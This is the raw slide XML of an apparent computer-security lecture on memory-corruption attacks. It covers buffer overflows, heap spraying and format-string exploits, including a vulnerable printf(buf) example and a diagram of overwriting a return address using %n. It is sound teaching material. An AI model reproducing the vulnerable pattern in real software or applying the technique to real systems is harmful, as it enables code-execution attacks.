              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Heap spraying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7BFD22-62C7-5B4F-80E7-3D044CE06712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485900" y="5118340"/>
            <a:ext cx="32194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North Korean attack; 200,000 victims, including major impact on NHS hospitals in the UK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E28C71-F930-1F43-A595-F34732437392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6635833" y="5015077"/>
            <a:ext cx="3606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Major cyberattack on Ukraine that propagated to other countries, estimated $10 billion damage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87BC01-28A6-F742-8CC9-65C635278708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3172740" y="4664100"/>
            <a:ext cx="261360" cy="398880"/>
            <a:chOff x="3172740" y="4664100"/>
            <a:chExt cx="26136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5B2911-465A-F341-963C-09355705E8B8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3172740" y="4664100"/>
                <a:ext cx="194400" cy="398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5B2911-465A-F341-963C-09355705E8B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64100" y="4655100"/>
                  <a:ext cx="2120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4E8DBC8-C601-2D45-8EDE-4393F6C4B158}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3334380" y="4681740"/>
                <a:ext cx="99720" cy="88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4E8DBC8-C601-2D45-8EDE-4393F6C4B15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25740" y="4673100"/>
                  <a:ext cx="11736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B5E8CF-8BD5-254E-A996-6882725448D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7243980" y="4722780"/>
            <a:ext cx="347760" cy="284400"/>
            <a:chOff x="7243980" y="4722780"/>
            <a:chExt cx="34776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F9B13C1-F030-9243-8F63-AB21C5FF5748}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7365300" y="4724580"/>
                <a:ext cx="159840" cy="282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F9B13C1-F030-9243-8F63-AB21C5FF57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56660" y="4715940"/>
                  <a:ext cx="1774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64B50AD-AEFC-EF4A-8677-B14457DBB048}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7243980" y="4722780"/>
                <a:ext cx="117000" cy="104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64B50AD-AEFC-EF4A-8677-B14457DBB04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34980" y="4714140"/>
                  <a:ext cx="134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0BF21A6-BCFF-1345-92E7-F55F21509A4C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7337220" y="4732500"/>
                <a:ext cx="254520" cy="59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0BF21A6-BCFF-1345-92E7-F55F21509A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28580" y="4723500"/>
                  <a:ext cx="272160" cy="7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2971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6" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9250D0F2-9EAD-724A-BEEC-3AD9A69DA5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Writing the Stack with Format Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE02045-E21A-3741-9EF5-0EC2230D76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6534150" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> format symbol tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> to write the number of characters that have been printed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(“Overflow this!%n”,&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>myVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>); …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> have an argument?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	… char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[16]=“Overflow this!%n”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>; …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc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1144A-19D9-BC48-A416-C1A41BEB9550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600950" y="2412890"/>
            <a:ext cx="3321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/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Argument of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>interpeted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> as the destination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C7754-8BF3-7A4D-8DC9-C531C1671A93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7615238" y="3241398"/>
            <a:ext cx="3364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14 is written into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>myVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> (why?)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9D74EE-3732-5F49-8D4C-BEB1CADD03E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2050256" y="5428110"/>
            <a:ext cx="8413924" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7E79"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Stack location pointed to by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>printf’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> internal stack pointer will be interpreted as the address into which the number of characters will be written!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B09AE3-B7E3-A648-839F-901784CC8B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6684435" y="2892735"/>
            <a:ext cx="841680" cy="186120"/>
            <a:chOff x="6684435" y="2892735"/>
            <a:chExt cx="84168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55F9DC8-82A0-C44E-BC2D-7F3E5E703D7D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6684435" y="2892735"/>
                <a:ext cx="841680" cy="186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55F9DC8-82A0-C44E-BC2D-7F3E5E703D7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75795" y="2884095"/>
                  <a:ext cx="8593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FE1D6A6-F85C-6F43-8D36-E9D6F14B2FFD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7510275" y="2948895"/>
                <a:ext cx="13320" cy="106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FE1D6A6-F85C-6F43-8D36-E9D6F14B2F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01635" y="2940255"/>
                  <a:ext cx="30960" cy="12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0116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Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49255388-310E-6F46-A191-11B195BE36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3950" y="3092451"/>
            <a:ext cx="845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89" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C512F9-553A-904A-8402-521D4CAE28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3950" y="3778251"/>
            <a:ext cx="845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93190" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927D5C5C-58B5-0849-B495-2662974F6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4" y="3092451"/>
            <a:ext cx="746125" cy="6858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miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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RET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1480710" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69F20441-6DE7-5C4F-A8BA-80B259313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3092451"/>
            <a:ext cx="3632200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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“… attackString%n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attack code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2505CCA5-DBB0-914D-A409-0FC7A3C6CEC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4781550" y="2863847"/>
            <a:ext cx="3205163" cy="1905000"/>
            <a:chOff x="2287" y="1561"/>
            <a:chExt cx="2019" cy="1200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93203" name="Rectangle 8" descr="Large checker board">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD21F6A3-2D25-C140-9DB6-1688DA44D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705"/>
              <a:ext cx="528" cy="43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8575" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="lg" len="lg"/>
              <a:tailEnd type="none" w="lg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+mn-lt"/>
                </a:rPr>
                <a:t>&amp;RET</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93204" name="AutoShape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBF52A-470A-8E43-8693-CF7ED4E72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7" y="2160"/>
              <a:ext cx="1906" cy="601"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -21055"/>
                <a:gd name="adj2" fmla="val -72455"/>
              </a:avLst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 type="none" w="lg" len="lg"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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Overwrite location under </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>printf’s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t> stack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>pointer with the address of RET;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>(buffer) will write the number of </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>characters in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>attackString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t> into RET</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93205" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3376A8-1A63-6942-ABF7-7346FD600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" y="1561"/>
              <a:ext cx="1632" cy="252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 958"/>
                <a:gd name="T1" fmla="*/ 192 h 252"/>
                <a:gd name="T2" fmla="*/ 45638517 w 958"/>
                <a:gd name="T3" fmla="*/ 0 h 252"/>
                <a:gd name="T4" fmla="*/ 2147483647 w 958"/>
                <a:gd name="T5" fmla="*/ 1 h 252"/>
                <a:gd name="T6" fmla="*/ 2147483647 w 958"/>
                <a:gd name="T7" fmla="*/ 252 h 2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8"/>
                <a:gd name="T13" fmla="*/ 0 h 252"/>
                <a:gd name="T14" fmla="*/ 958 w 958"/>
                <a:gd name="T15" fmla="*/ 252 h 2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8" h="252">
                  <a:moveTo>
                    <a:pt x="0" y="192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958" y="252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3193" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F13BD3-92F4-6945-8FA7-09E47F4A7FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8047038" y="3595688"/>
            <a:ext cx="152400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33333"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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1600">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93194" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99D1049-9CB7-224F-91BB-610879DE0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749" y="4022727"/>
            <a:ext cx="1676401" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75486"/>
              <a:gd name="adj2" fmla="val -1541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Return execution to this address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93195" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B182C4E-BC53-9C4B-A031-5E79979FEA55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3067050" y="1104901"/>
            <a:ext cx="152400" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 195833"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst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93196" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47003963-FD66-6842-8850-DA5050F24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3850" y="2224089"/>
            <a:ext cx="2696572" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69292"/>
              <a:gd name="adj2" fmla="val -3731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Buffer with attacker-supplied </a:t>
            </a:r>
          </a:p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input string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1480719" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911A077A-3228-6541-ADE8-19CC8B545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7339" y="3900489"/>
            <a:ext cx="2263761" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20111"/>
              <a:gd name="adj2" fmla="val -84435"/>
            </a:avLst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 type="none" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"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Number of characters in</a:t>
            </a:r>
          </a:p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attackString must be </a:t>
            </a:r>
          </a:p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equal to … what?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93198" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22F4157-BAD8-FB4F-ABE3-59432FEC43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0" y="445742"/>
            <a:ext cx="4973639" cy="397221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1600" i="1" dirty="0"/>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Exploiting Format String Vulnerabilities”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t> for details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11281" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE97167-B20B-DD49-BB42-A25D6C0A9067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3838576" y="3748089"/>
            <a:ext cx="4252913" cy="1096963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2679"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 691"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2679"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 691"/>
              <a:gd name="T4" fmla="*/ 0 w 2679"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 691"/>
              <a:gd name="T6" fmla="*/ 0 w 2679"/>
              <a:gd name="T7" fmla="*/ 0 h 691"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2679"/>
              <a:gd name="T13" fmla="*/ 0 h 691"/>
              <a:gd name="T14" fmla="*/ 2679 w 2679"/>
              <a:gd name="T15" fmla="*/ 691 h 69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79" h="691">
                <a:moveTo>
                  <a:pt x="2679" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2452" y="691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="69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11282" name="AutoShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E1907B8-3E9E-8F45-BFDA-8D9515C03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3951" y="4965702"/>
            <a:ext cx="9420224" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
